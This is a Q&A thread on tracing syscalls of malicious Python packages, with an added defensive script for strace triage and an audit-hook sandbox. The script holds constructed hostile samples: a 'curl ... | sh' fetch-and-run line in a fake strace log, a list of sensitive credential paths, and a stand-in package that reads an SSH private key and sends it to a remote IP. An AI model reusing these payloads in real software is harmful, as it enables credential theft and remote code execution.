I want to capture syscalls of malicious python packages. Is there any way to do this? Or can I capture syscalls in wireshark?

For reference: Typosquatted Python packages, much like StackOverflow copy/paste.

Asked by Awaiz Khan; edited by artless noise.

1 Answer

  1. Wireshark does not trace syscalls, it traces the network traffic, two completely different things [note]

  2. Why are you even importing and/or installing such packages

  3. You can use strace on any */Linux distribution

    3.1. Though strace output is often hard to read, you're better off reading the src

  4. Use a virtual machine, just in case, you know

Note: Wireshark can trace USB as well as network traffic.

This is unlikely to solve your problem as read() is a function. If it reads /etc/passwd, it is different from /etc/python/debian_config. You would have to examine the arguments to the syscall.

Answered by Ari157; edited by artless noise.
  • Hey, I want to capture the syscalls of a malicious python package which proceeds in a software supply chain attack. Can you tell me how I can strace any package? Thanks – Awaiz Khan Aug 19 '22 at 11:09
  • @AwaizKhan Read the `strace` command manual, it's very easy. But you won't get very far by tracing system calls (unless the python package is using mostly C code). Python is too high-level. I would investigate some debugging/sandbox solution specific to python (you can monkey-patch almost anything in python). – Margaret Bloom Aug 19 '22 at 12:21
  • @AwaizKhan `strace python3 ....` – Ari157 Aug 19 '22 at 14:03
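The following is an added example, not code from the question, the answer or the commenters. It shows both approaches discussed above in one script: post-processing `strace -f` output so that the *arguments* of `openat`, `connect` and `execve` are examined rather than just the syscall names (the answer's point about `read()`), and, per the comment suggesting a Python-specific sandbox, importing the package under a `sys.addaudithook()` hook (Python 3.8+) that sees `open`, `socket.connect`, `subprocess.Popen` and `os.system` with their arguments and can refuse the outbound connection instead of merely logging it. The strace log, the sensitive-path list and the package `evilpkg_demo` are all constructed for the example; the package is a stand-in that reads a key file and tries to phone home at import time.

```python
"""Added example: two ways to triage what a Python package does when imported.

1. Post-process the output of
     strace -f -e trace=file,network,process -o trace.log python3 -c 'import pkg'
   and look at the arguments of each syscall (the name alone says little).
2. Run the import under a sys.addaudithook() hook (Python 3.8+), which sees
   Python-level events with their arguments and can abort an operation.
"""
import importlib
import os
import re
import sys
import tempfile

# ---- 1. strace post-processing ----------------------------------------------
# One syscall per line, optionally prefixed by a PID (strace -f).  Lines such as
# "+++ exited with 0 +++" do not match and are skipped.
SYSCALL_RE = re.compile(r"^(?:(?P<pid>\d+)\s+)?(?P<name>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>.*)$")
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
PORT_RE = re.compile(r"htons\((\d+)\)")
# Constructed list of paths a build/install step has no business touching.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "/.ssh/", "/.aws/", "/.gnupg/", "/.bash_history")

# Constructed sample in the format produced by `strace -f` (not a real capture).
SAMPLE_STRACE = """\
4242  execve("/usr/bin/python3", ["python3", "-c", "import evilpkg"], 0x7ffc1234a5b0 /* 24 vars */) = 0
4242  openat(AT_FDCWD, "/usr/lib/python3/dist-packages/evilpkg/__init__.py", O_RDONLY|O_CLOEXEC) = 3
4242  openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 4
4242  openat(AT_FDCWD, "/home/dev/.ssh/id_ed25519", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
4242  socket(AF_INET, SOCK_STREAM|SOCK_CLOEXEC, IPPROTO_TCP) = 5
4242  connect(5, {sa_family=AF_INET, sin_port=htons(8443), sin_addr=inet_addr("203.0.113.10")}, 16) = 0
4243  execve("/bin/sh", ["sh", "-c", "curl -s http://203.0.113.10/s | sh"], 0x55a1c0ffee00 /* 24 vars */) = 0
4243  +++ exited with 0 +++
"""

def parse_strace_line(line):
    """Return (pid, syscall, raw args, [quoted string args], retval), or None."""
    m = SYSCALL_RE.match(line.strip())
    if not m:
        return None
    return m["pid"], m["name"], m["args"], QUOTED_RE.findall(m["args"]), m["ret"]

def triage_strace(text):
    """Flag calls whose arguments matter: sensitive opens, IP connects, execs."""
    findings = []
    for line in text.splitlines():
        parsed = parse_strace_line(line)
        if parsed is None:
            continue
        pid, name, raw, strings, ret = parsed
        if name in ("open", "openat") and strings and any(s in strings[0] for s in SENSITIVE):
            findings.append((pid, name, strings[0], ret))          # path is the first quoted arg
        elif name == "connect" and "AF_INET" in raw and strings:
            port = PORT_RE.search(raw)
            findings.append((pid, name, f"{strings[0]}:{port.group(1) if port else '?'}", ret))
        elif name == "execve" and strings:
            findings.append((pid, name, " ".join(strings[1:]) or strings[0], ret))  # argv
    return findings

# ---- 2. in-process sandbox with sys.addaudithook ----------------------------
WATCHED = {"open", "socket.connect", "subprocess.Popen", "os.system", "os.exec"}
_audit = {"armed": False, "events": []}

def _plain(a):
    """Keep printable args; replace objects (e.g. the socket itself) by their type name."""
    return a if isinstance(a, (str, bytes, int, tuple, list, type(None))) else type(a).__name__

def _hook(event, args):
    if not _audit["armed"] or event not in WATCHED:
        return
    _audit["events"].append((event, tuple(_plain(a) for a in args)))
    if event == "socket.connect":      # deny rather than log: the package never phones home
        raise PermissionError(f"blocked {event} {args[1:]}")

sys.addaudithook(_hook)                # hooks cannot be removed, so gate them with "armed"

def run_under_audit(pkg_dir, modname):
    """Import modname from pkg_dir with the hook armed; return the recorded events."""
    _audit["events"].clear()
    sys.path.insert(0, pkg_dir)
    sys.dont_write_bytecode = True
    _audit["armed"] = True
    try:
        importlib.import_module(modname)
    finally:
        _audit["armed"] = False
        sys.path.remove(pkg_dir)
        sys.modules.pop(modname, None)  # so a later run imports it afresh
    return list(_audit["events"])

# Constructed stand-in for a typosquatted package: import-time key theft + callback.
EVIL_INIT = '''\
import os, socket
try:
    with open(os.path.expanduser("~/.ssh/id_ed25519")) as f:
        loot = f.read()
except OSError:
    loot = ""
try:
    s = socket.socket(); s.settimeout(0.2)
    s.connect(("203.0.113.10", 8443)); s.sendall(loot.encode()); s.close()
except OSError:
    pass
'''

def demo_audit():
    """Write the constructed package to a temp dir and import it under the hook."""
    d = tempfile.mkdtemp()
    os.mkdir(os.path.join(d, "evilpkg_demo"))
    with open(os.path.join(d, "evilpkg_demo", "__init__.py"), "w") as f:
        f.write(EVIL_INIT)
    return run_under_audit(d, "evilpkg_demo")

if __name__ == "__main__":
    for f in triage_strace(SAMPLE_STRACE):
        print("strace:", f)
    for e in demo_audit():
        print("audit :", e)
```

Run it in a throwaway VM, as the answer says. For a real package, replace the sample with the `-o trace.log` output of the `strace` command in the docstring; `-f` matters because the sub-process spawned by `execve("/bin/sh", ...)` is where the payload usually runs. The two views complement each other: the audit hook only sees operations that go through the Python runtime, so a native extension module making syscalls directly is invisible to it and only strace will show it, while strace cannot tell you which Python function issued a given `openat` and cannot stop it.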